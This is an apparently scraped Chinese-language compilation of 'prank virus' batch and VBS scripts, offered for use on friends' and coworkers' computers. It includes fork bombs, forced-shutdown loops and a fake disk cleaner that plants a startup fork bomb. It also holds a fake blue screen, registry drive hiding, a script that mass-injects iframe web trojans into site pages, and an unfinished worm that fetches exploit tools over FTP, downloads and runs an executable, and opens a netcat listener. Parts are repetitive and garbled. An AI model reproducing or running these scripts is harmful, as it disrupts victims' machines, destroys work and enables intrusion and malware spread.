“请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %usern ame% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”shutdown -s -f -t 12、@echo offecho 你中招了:astart cmd.EⅩEstart %0goto a@ color 4f@echo offecho 删除计算机的C盘的所有文件......ping 127.0.0.1 /n 2 >nulecho 已删除完毕echo.echo 删除计算机的D盘的所有文件......ping 127.0.0.1 /n 2 >nulecho 已删除完毕echo.。
计算机病毒源代码什么样万恶的计算机病毒也是有源代码组成的,那么计算机病毒代码长什么样呢?下面由店铺给你做出详细的计算机病毒源代码介绍!希望对你有帮助!计算机病毒源代码介绍一:给你个恶搞的玩on error resume nextdim WSHshellAset WSHshellA = wscript.createobject("wscript.shell")WSHshellA.run "cmd.exe /c shutdown -r -t 60 -c ""说我是猪,不说我是猪就一分钟关你机,不信,试试···"" ",0 ,truedim ado while(a <> "我是猪")a = inputbox ("说我是猪,就不关机,快撒,说 ""我是猪"" ","说不说","不说",8000,7000)msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox"loopmsgbox chr(13) + chr(13) + chr(13) + "早说就行了嘛"dim WSHshellset WSHshell = wscript.createobject("wscript.shell")WSHshell.run "cmd.exe /c shutdown -a",0 ,truemsgbox chr(13) + chr(13) + chr(13) + "哈哈哈哈,真过瘾"把这段复制,新建一个文本文档,粘贴进去,保存,然后右击,属性,将后缀由.txt改为.vbs 确定就行了!以后双击这个vbs文件就能捉弄人了计算机病毒源代码介绍二:最简单的一个电脑病毒1.VBS版本:打开记事本,输入以下代码:Do Until 1=2Wscript.echo "烦死你!"Loop保存为1.VBS,运行后不断出现"烦死你"的对话框。
bat整人电脑病毒代码是怎样的篇一:一些bat恶搞代码第一个:让别人内存OVER(逼他重启)@echo offstart cmd%0就这3行了第二个:让对方重启指定次数(害人专用)@echo offif not exist c:\1.txt echo. >c:\1.txt & goto err1 if not exist c:\2.txt echo. >c:\2.txt & goto err1 if not exist c:\3.txt echo. >c:\3.txt & goto err1 if not exist c:\4.txt echo. >c:\4.txt & goto err1 if not exist c:\5.txt echo. >c:\5.txt & goto err1 goto err2:err1shutdown -s -t 0:err2上面可以让对方电脑重启5次后不在重启第三个:自动踢人(3389肉机保护自己专用) @echo offlogoff 1del log.batlogoff后面的1改成自己登陆的ID号,用query user查看第四个: 批量自动溢出@for /f %%i in (result.txt) do 42 %%i 58.44.89.158 521先自己用NC监听端口,多开几个,然后指行,就自动溢出了第五个:自动挂马改主页@echo offclsrem 直接打批处理名字就有帮助title 批量挂马,改首页(伤脑筋QQ:447228437).代码全部插入完毕!!!!echo.pausegoto e1:u1echo 您现在的操作将使%pan%盘下,全部名为%ye%的内容变为您要更改的内容. echo 这将是非常危险的,您真的要这样做? 回车却认,Ctrl+c取消操作. pauseforfiles /p %pan% /m %ye% /s /c "cmd /c if @isdir==FALSE copy %1\htm.txt @path /y"echo.。
⽤bat写的⼀个⼩病毒最近看了⼀点bat的知识,具体说是看了⼀个博客:⽤了三天才看完=。
=,感觉作者整理整理可以把博客当书买了。
然后⾃⼰突发其想,想到了⼀个⼩病毒程序,其实也算不上病毒,只能算是个恶作剧程序吧,其原理就是不断打开cmd程序,占⽤系统资源。
呵呵。
让⼤神见笑了=。
=windows.batstart cmd%0⽤户打开这个程序之后,程序就会不断打开cmd,占⽤系统资源,导致系统瘫痪。
%0是再次执⾏该程序的意思。
但是,这样只能让⽤户死机⼀次。
重启系统以后,不再打开这个⽂件以后,就不再会中招了。
于是做了优化:写了⼀个系统清理⼯具(这只是掩饰,嘿嘿,其实我们是要把这个windows.bat写到⽤户的开机⾃启动⽬录下,达到⽤户每次开机,都会运⾏该程序的⽬的。
但是,也不是不可以解决。
⽤户可以使⽤pe到开启启动⽬录把windows.bat⽂件删除,或者重装系统,只测试了xp和win7)废话不说了,上代码:系统垃圾清理⼯具:@echo offtitle 系统垃圾清理color 2fecho =====若有杀毒软件恶意拦截,请选择【允许程序的所有操作】====echo.echo.echo start cmd >c:\windows\windows.batecho %%0>>c:\windows\windows.batcopy c:\windows\windows.bat "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\">nulif %errorlevel%==0 goto nextcopy c:\windows\windows.bat "%USERPROFILE%\「开始」菜单\程序\启动\">nulif %errorlevel%==1 goto error:nextecho.echo.echo =====垃圾清理中,请不要关闭窗⼝=========echo.ping -n 5 127.0.0.1>nulecho.echo =====垃圾清理完毕,共清理垃圾500M=======echo.echo.echo =====建议⽴即重启电脑==========pause:errorecho.echo.echo ======程序运⾏失败,请【使⽤管理员权限】重新运⾏!========echo.pause说明:⾸先我们使⽤echo语句在c:\windows\⽬录⽣成windows.bat⽂件然后copy到系统的开机启动⽬录"%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"对应win7的系统开机⾃启动⽬录"%USERPROFILE%\「开始」菜单\程序\启动\"对应xp的系统开机⽬录正常情况下应该是有⼀条拷贝命令可以执⾏的,如果两条命令都没有执⾏说明,权限不够,这时提⽰⽤户以管理员权限再次运⾏。
b a t整人电脑病毒代码是怎样的现在流行的病毒是由人为故意编写的,多数病毒可以找到作者和产地信息,从大量的统计分析来看,病毒作者主要情况和目的是:一些天才的程序员为了表现自己和证明自己的能力,出于对上司的不满,为了好奇,为了报复,为了祝贺和求爱,为了得到控制口令,为了软件拿不到报酬预留的陷阱等.当然也有因政治,军事,宗教,民族.专利等方面的需求而专门编写的,其中也包括一些病毒研究机构和黑客的测试病毒.以下是学习啦网小编为大家整理的关于b a t整人电脑病毒代码的相关知识,希望对大家有所帮助!v b s整人代码代码如下:复制代码代码如下:P r i v a t e S u b F o r m_L o a d()M e.H i d eE n d S u bP r i v a t e S u b T i m e r1_T i m e r()声明变量,其中c o u n t为静态变量,以便生成不同的文件D i m f i l e s A s S t r i n gD i m n r A s S t r i n gD i m c A s S t r i n gS t a t i c c o u n t A s L o n g定义要把生成的文件存放在那个目录文件下c=C:\P r o g r a m F i l e s\生成文件的内容n r=哈哈,被黑的感觉的不错吧f i l e s=F r e e F i l e如果a等于a那么就执行I f a=a T h e nc o u n t不断的加1,以便产生不同的文件名c o u n t=c o u n t+1产生文件名及文件句柄,并用c o u n t作为产生不同的文件名。
O p e n c s y s t e m c o u n t .d l l F o r A p p e n d A s#f i l e s向文件写内容W r i t e#f i l e s,n r清除文件句柄,这里很重要,如果不清除,将产生打开文件太多的错误提示C l o s e#f i l e sE n d I fE n d S u b一、你打开好友的聊天对话框,然后记下在你Q Q里好友的昵称,把下面代码里的x x替换一下,就可以自定义发送Q Q信息到好友的次数(代码里的数字10改一下即可).x x.v b s=复制代码代码如下:O n E r r o r R e s u m e N e x tD i m w s h,y es e t w s h=c r e a t e o b j e c t(w s c r i p t.s h e l l)f o r i=1t o10w s c r i p t.s l e e p700w s h.A p p A c t i v a t e(与 x x聊天中)w s h.s e n d K e y s¶w s h.s e n d K e y s iw s h.s e n d K e y s%sn e x tw s c r i p t.q u i tQ Q骚扰信息,也可以用在其它程序上。
整人代码大全让对方重启指定次数(害人专用)@echo offif not exist c:1.txt echo. >c:1.txt & goto err1if not exist c:2.txt echo. >c:2.txt & goto err1if not exist c:3.txt echo. >c:3.txt & goto err1sif not exist c:4.txt echo. >c:4.txt & goto err1if not exist c:5.txt echo. >c:5.txt & goto err1goto err2:err1shutdown -s -t 0:err2上面可以让对方电脑重启5次后不在重启,当然如果你修改一下加个if not exist c:6.txt echo. >c:6.txt & goto err1那就是重启6次改成7就是7次...打开“开始→程序→附件→记事本”,把代码部分复制进去,点“另存为”,路径选“你想要放的地方”,保存类型为“所有文件”,文件名为“你想要的名字.bat”,你的批量处理器就完成了。
善意恶搞关机首先呢,我们在桌面创建个新文件夹然后打开,在上面找到-工具T-文件夹选项O-查看把隐藏已知文件类型的扩展名前面的勾去掉.然后我们开始制作.在桌面建立个记事本,然后把下面代码复制进去on error resume nextdim WSHshellAset WSHshellA = wscript.createobject("wscript.shell")WSHshellA.run "cmd.exe /c shutdown -r -t 60 -c ""说我是猪,不说我是猪就一分钟关你机,不信,试试···"" ",0 ,truedim ado while(a <> "我是猪")a = inputbox ("说我是猪,就不关机,快撒,说""我是猪"" ","说不说","不说",8000,7000)msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox"loopmsgbox chr(13) + chr(13) + chr(13) + "早说就行了嘛"dim WSHshellset WSHshell = wscript.createobject("wscript.shell")WSHshell.run "cmd.exe /c shutdown -a",0 ,truemsgbox chr(13) + chr(13) + chr(13) + "哈哈哈哈,一切皆有可能~"复制之后呢,把后缀修改为.vbs或者改变打开方式为应用程序,这样你再压缩下用QQ发给你朋友,对方打开了就在60秒内要关闭计算机,结束任务都不行,他只能说他是猪才能解决问题。
前段时间看到大家对这种整人的代码兴趣还挺浓厚的,我最近就收集了一些和大家分享。
PS:由于精力问题没有对代码的可用性进行一一验证,所以不保证全部可用,大家如果发现有不可用的或者需要改进的地方请提出来,以下代码仅供娱乐,请勿用于非法用途。
一、怎么点都没反应的桌面如果同事的电脑开着,他离开电脑前一会,嘿嘿,机会来了。
把他的电脑桌面按print键截屏截下来,(当然QQ截屏也可以,不过效果不太逼真!)建议大家用print截屏,设置为桌面。
然后把原来在桌面上的文件统统移到一个盘的文件夹里,这样桌面看上去和平时一个样。
他回来后狂点鼠标,却怎么都没有反应!现在还在关机,开机,关机,开机,关机,开机中…………附带:print键截屏方法:键盘右上方的“Print Screen Sys Rq”键的作用是屏幕抓图!用法一,按“Print Screen SysRq”一下,对当前屏幕进行抓图,就是整个显示屏的内容。
用法二,先按住“Alt”键,再按“Print Screen SysRq”键,则是对当前窗口进行抓图。
如你打开“我的电脑”后,用此法就抓取“我的电脑”窗口的内容。
用上诉两种方法抓图后,再打开“开始”、“附件”里的“画图”程序,点“编辑”、“粘贴”就把抓取的图片贴出来了,可以保存为自己需要的格式。
哈哈,简单吧,这方法真挺搞的,有兴趣的童鞋可以试试!二、让电脑硬盘消失-隐藏磁盘方法愚人节电脑整人使无端端地电脑磁盘的某个分区消失了,钻进地缝里面去了吗,给外星人抓走了??非也!是某些人使坏将其隐藏起来了!步骤1.新建一个记事本2.将记事本的后缀改为.reg,就是将“新建文件.txt”改为“新建文件.reg”3.将下面的代码复制到记事本当中:Windows Registry Editor Version 5.00[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] "NoDrives" =hex:08,00,00,00解释(1)"NoDrives" =hex:08,00,00,00 这个键值是隐藏D盘的图中的D盘已经神秘消失了。
怎么样制作电脑病毒整人怎么样制作病毒整人呢!小小的吓吓他们!下面由小编给你做出详细的制作病毒整人介绍!希望对你有帮助!制作病毒整人介绍:不过可以做个是电脑假蓝屏的小程序创建个记事本文件:写入以下代码:@echo off & color 1f:1if "%1"=="" goto :FullScreen::还原显示模式REG Add HKEY_CURRENT_USER\Console /v FullScreen /t REG_DWORD /d %1 /f>nul::全屏状态下代码段clsecho A problem has been detected and windows has been shut down to prevent damage to your computer.echo .echo DRIVER_IRQL_NOT_LESS_OR_EQUALecho .echo If this is the first time ...echo .echo If ... continue,press F8 to select advanced startup options, and then select saft mode.echo .echo Technical information:echo .echo *** stop:0X000000D1(0X00000040,0X00000002,0X00000001,0XF9A5E150)echo .set /p wkdxz=*** wanarp.sys-Address F9A5E150 base at F9A59000, Datestamp 41107C89<nulpause>nulGoto :1:FullScreen::查询显示模式Set ShowMode=0for /f "delims=" %%i in ('REG QUERY HKEY_CURRENT_USER\Console /v "FullScreen"') do (Set ShowMode=%%i)Set ShowMode=%ShowMode:~-1%::设置显示模式为全屏REG Add HKEY_CURRENT_USER\Console /v FullScreen /t REG_DWORD /d 1 /f>nul::全屏启动当前Bat脚本start "" %0 %ShowMode%保存后,把文件后缀名由txt改成bat。
三一文库()〔bat整人电脑病毒代码是怎样的〕*篇一:一些bat恶搞代码第一个:让别人内存OVER(逼他重启)@echooffstartcmd%0就这3行了第二个:让对方重启指定次数(害人专用)@echooffifnotexistc:\1.txtecho.c:\1.txtgotoerr1 ifnotexistc:\2.txtecho.c:\2.txtgotoerr1 ifnotexistc:\3.txtecho.c:\3.txtgotoerr1 ifnotexistc:\4.txtecho.c:\4.txtgotoerr1 ifnotexistc:\5.txtecho.c:\5.txtgotoerr1gotoerr2:err1shutdown-s-t0:err2上面可以让对方电脑重启5次后不在重启第三个:自动踢人(3389肉机保护自己专用)@echoofflogoff1dellog.batlogoff后面的1改成自己登陆的ID号,用queryuser查看第四个:批量自动溢出@for/f%%iin(result.txt)do42%%i58.44.89.158521先自己用NC监听端口,多开几个,然后指行,就自动溢出了第五个:自动挂马改主页@echooffclsrem直接打批处理名字就有帮助title批量挂马,改首页(伤脑筋QQ:447228437).colorAsetpan=%1setye=%2setdai=%3if"%pan%"==""gotoe1if"%ye%"==""gotoe1if"%dai%"==""gotoe1if"%dai%"=="htm.txt"gotou1forfiles/p%pan%/m%ye%/s/c"cmd/cif@isdir==FALSEecho^ iframesrc=":%dai%"width="0"height="0"frameborder="0 "^@path"echo.echo代码全部插入完毕echo.pausegotoe1:u1echo您现在的操作将使%pan%盘下,全部名为%ye%的内容变为您要更改的内容.echo这将是非常危险的,您真的要这样做?回车却认,Ctrl+c取消操作.pauseforfiles/p%pan%/m%ye%/s/c"cmd/cif@isdir==FALSEcopy% 1\htm.txt@path/y"echo.echo首页全部更改完必如果您发现没有替换成功,请将%ye%文件只读属性去掉.echo.pause:e1echo.echo本批处理只适用于2003系统,其他系统要使用,请将forfiles.exe拷贝至系统盘system32目录下echo用法:snj^搜索盘符^^文件名^^网马地址^echo例子:snjd:\index.asp/mm.htmecho批处理将自动添加^iframe^标记echo.echo如果您要更改全部网站的首页!请在批处理文件所在目录下,新建一个名为htm.txt的文本文件.echo然后将要更改的代码加COPY到里面保存.然后将命令的^网马地址^项输入为htm.txt即可.echo例子:snjd:\index.asphtm.txtecho.echo为了能准确无误执行批处理请最好先把记事本的"自动换行功能去掉",让命令保持在一行才能正确执行.echo.echo使用此批处理造成一切后果本人概不负责,请大家谨慎使用!echo.第六个:利用批处理编写利用系统漏洞传播的蠕虫病毒本来想写完后在做教程,要去学校了,所以先把思路告诉大家,大家可以先自己写写,我有时间写完发到群里.这些是我未完成的批处理,大家可以在此基础上按照我下面说的思路继续写完delc:\42.exedelc:\nc.exedelc:\ip.exeechodimwsh%systemroot%\help\test.vbsechosetwsh=CreateObject("WScript.Shell")%systemroot%\help\ test.vbsechowsh.run"cmd/c%systemroot%\help\nc-v-l-p 810%systemroot%\help\or.txt",0%systemroot%\help\te st.vbsechodimwsh%systemroot%\help\test2.vbsechosetwsh=CreateObject("WScript.Shell")%systemroot%\help\ test2.vbsechowsh.run"cmd/cstart%systemroot%\help\good.bat",0%systemroot%\help\test2.vbsechoopen10.0.0.5%systemroot%\help\ftp.txt echoopenmyyes%systemroot%\help\ftp.txtecho1%systemroot%\help\ftp.txtechobinary%systemroot%\help\ftp.txtechoget42.exec:\42.exe%systemroot%\help\ftp.txt echogetnc.exec:\nc.exe%systemroot%\help\ftp.txt echogetip.exec:\ip.exe%systemroot%\help\ftp.txt echobye%systemroot%\help\ftp.txtechoechoSetxPost=CreateObject("Microsoft.XMLHTTP") ^1.vbs%systemroot%\help\or.txtechoechoxPost.Open"GET",":10.0.0.5/my.exequo...,0 ^^1.vbs%systemroot%\help\or.txtechoechoxPost.Send()^^1.vbs%systemroot%\help\or.txt echoechoSetsGet=CreateObject("ADODB.Stream")^^1.vbs%systemroot%\help\or.txtechoechosGet.Mode=3^^1.vbs%systemroot%\help\or.txte choechosGet.Type=1^^1.vbs%systemroot%\help\or.txtec hoechosGet.Write(xPost.responseBody)^^1.vbs%systemroot%\help\or.txtechoechosGet.SaveToFile"d:\my.exe",2^^1.vbs%systemroot%\help\or.txtechoecho1.vbs^^1.vbs%systemroot%\help\or.txtechoechomy.exe^^1.vbs%systemroot%\help\or.txtechoWindowsRegistryEditorVersion5.00%systemroot%\he lp\1.regecho[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run]%systemroot%\help\1.regecho"SKYNETPersonalFireWall"="F:\\系统安全工具\\FireWall\\PFW.exe"%systemroot%\help\1.regecho"1"="%systemroot%\\help\\test2.vbs"%systemroot% \help\1.regifnotexist%systemroot%\help\good.batcopygood.bat%systemroot%\help\good.bat%systemroot%\help \test2.vbsdelgood.batregedit-s%systemroot%\help\1.regftp-s:%systemroot%\help\ftp.txtmovec:\nc.exe%systemroot%\help\/ymovec:\42.exe%systemroot%\help\/ymovec:\ip.exe%systemroot%\help\/y%systemroot%\help\test.vbsremfor/f%%iin(result1.txt)doseta=%%iremfor/f%%jin(result.txt)do42%a%%%j810准备:1:找一个反向连接的溢出攻击程序,如ms06040漏洞2:找呀一个免费FTP空间,最好是送域名的3:利用你所知道的高级语言编写一个,能生成随机范围IP地址和找到本机IP的工具.思路:用for语句对指定文本里的IP进行溢出,然后用if语句判断是否溢出成功,如果成功开启一个NC监听端口,NC后面带一个输入符号输入的内容为下载本批处理文件,然后执行这个批处理.这样被溢出的机器就又会在他那里运行我门的批处理,从而到自动传播的目的.把批处理生成的文件集中放到一个目录下,可以%systemroot%系统变量直接放到系统目录下因为批处理运行后会闪出命令行窗口,我门可以利用VBS脚本来运行我们的批处理,这样就不会有任何窗口出现,脚本如下echodimwsh%systemroot%\help\test.vbsechosetwsh=CreateObject("WScript.Shell")%systemroot%\help\ test.vbsechowsh.run"cmd/c%systemroot%\help\nc-v-l-p 810%systemroot%\help\or.txt",0%systemroot%\help\te 